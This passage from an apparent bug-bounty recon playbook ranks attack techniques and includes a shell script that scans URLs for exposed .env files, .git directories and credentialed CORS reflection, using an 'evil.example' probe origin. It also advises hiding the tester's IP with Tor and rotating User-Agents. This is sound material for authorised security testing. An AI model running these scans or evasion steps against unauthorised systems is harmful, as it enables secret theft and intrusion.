&lt;td&gt;&lt;strong&gt;Do FIRST&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;JS bundle analysis (secrets)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Do SECOND&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CORS misconfig test&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Always test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firebase anon access&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If API key found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supabase anon access&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If anon key found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud Functions (no auth)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If project ID found&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WordPress REST API + XML-RPC&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If target is WP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub code search&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;With personal token&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Web Cache Poisoning&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;If CDN confirmed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Web Cache Deception&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;If cache + sensitive data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Subdomain takeover&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Automatable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SA key testing&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Roughly 1 in 30 leaked keys is still valid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SQLi (time-based blind)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;On all logins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker privesc&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Only if in docker group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exposed source maps&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Always check&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public self-hosted GitLab&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;If target has GitLab&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Port scan (RustScan)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Use on all targets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Masscan on ranges&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;For /8 or larger&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
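&lt;p&gt;The two &amp;ldquo;Do FIRST&amp;rdquo; rows and the CORS row of the table above as a triage script, added here as an example and not taken from the playbook. The point it adds is the false-positive filtering: a 200 on &lt;code&gt;/.env&lt;/code&gt; from a SPA with a catch-all route, or a reflected Origin without &lt;code&gt;Access-Control-Allow-Credentials: true&lt;/code&gt;, is not a finding, and a script that reports them wastes the reader&amp;rsquo;s time. Assumed, not from the page: the function names, the &lt;code&gt;RUN_TRIAGE&lt;/code&gt; gate, the &lt;code&gt;https://evil.example&lt;/code&gt; probe origin, and the constructed response bodies and headers the checks are exercised against.&lt;/p&gt;

```shell
#!/bin/sh
# Added example, not the playbook's own code: triage for the .env / .git and
# CORS rows with the checks that separate a real finding from a catch-all 200.
# Assumes curl on PATH and an in-scope URL list when RUN_TRIAGE=1; the three
# classifier functions are pure text processing and need no network.

# A 200 on /.env proves nothing on SPAs with a catch-all route. Require dotenv
# shaped lines (KEY=value) and refuse anything that looks like an HTML page.
looks_like_dotenv() {
  if printf '%s\n' "$1" | grep -qiE 'doctype|html>'; then
    return 1
  fi
  printf '%s\n' "$1" | grep -qE '^[A-Za-z_][A-Za-z0-9_]*=.+'
}

# /.git/HEAD from a real checkout is "ref: refs/heads/..." or a bare 40-hex SHA.
looks_like_git_head() {
  printf '%s\n' "$1" | grep -qE '^(ref: refs/|[0-9a-f]{40}$)'
}

# CORS is only worth reporting when an attacker-chosen Origin (or "null") is
# reflected AND credentials are allowed; a "*" never carries cookies in a browser.
# $1 = raw response headers, $2 = the Origin that was sent.
cors_verdict() {
  hdrs=$(printf '%s\n' "$1" | tr -d '\r')
  origin="$2"
  acao=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-origin:' | sed 's/^[^:]*:[[:space:]]*//' || true)
  acac=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-credentials:' | sed 's/^[^:]*:[[:space:]]*//' || true)
  case "$acao" in
    "$origin"|null)
      if [ "$acac" = "true" ]; then
        echo "vulnerable: $acao reflected with credentials"
      else
        echo "reflected-without-credentials"
      fi ;;
    "*") echo "wildcard-without-credentials" ;;
    "")  echo "no-cors-headers" ;;
    *)   echo "fixed-origin" ;;
  esac
}

# One target: fetch, classify, print only what survived the filters.
# The CORS probe is a GET with headers dumped to stdout (-D -), not a HEAD,
# so the headers are the ones a browser would actually receive.
probe_url() {
  base="$1"
  origin="https://evil.example"
  if looks_like_dotenv "$(curl -s -m 10 "$base/.env")"; then
    echo "[.env exposed] $base/.env"
  fi
  if looks_like_git_head "$(curl -s -m 10 "$base/.git/HEAD")"; then
    echo "[.git exposed] $base/.git/HEAD"
  fi
  hdrs=$(curl -s -m 10 -o /dev/null -D - -H "Origin: $origin" "$base/")
  echo "[cors] $base $(cors_verdict "$hdrs" "$origin")"
}

# RUN_TRIAGE=1 ./triage.sh alive.txt
if [ "${RUN_TRIAGE:-0}" = 1 ]; then
  cat "${1:?usage: RUN_TRIAGE=1 triage.sh alive.txt}" | while read -r url; do
    probe_url "$url"
  done
fi
```

&lt;p&gt;When &lt;code&gt;looks_like_git_head&lt;/code&gt; fires, the next step is the usual &lt;code&gt;.git&lt;/code&gt; dump, but only after confirming &lt;code&gt;/.git/config&lt;/code&gt; also returns something git-shaped: a few frameworks serve a static 200 for any dotfile path and the HEAD check alone is not enough on those.&lt;/p&gt;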
&lt;hr&gt;
&lt;h3 id="final-words" &gt;
&lt;div&gt;
&lt;a href="#final-words"&gt;
##
&lt;/a&gt;
Final Words
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Golden rules&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Document EVERYTHING — what you discover today is tomorrow&amp;rsquo;s path&lt;/li&gt;
&lt;li&gt;One finding leads to another — never stop at the first discovery&lt;/li&gt;
&lt;li&gt;Prioritize impact — CRUD without auth &amp;gt; info disclosure &amp;gt; low severity&lt;/li&gt;
&lt;li&gt;Protect your IP — Tor/proxy-ns, delays, rotating User-Agent&lt;/li&gt;
&lt;li&gt;Be ethical — only test what is in scope and with authorization&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Continuous update&lt;/strong&gt;: As new techniques are validated in the field, this document should be expanded.&lt;/p&gt;
&lt;hr&gt;</description></item></channel></rss>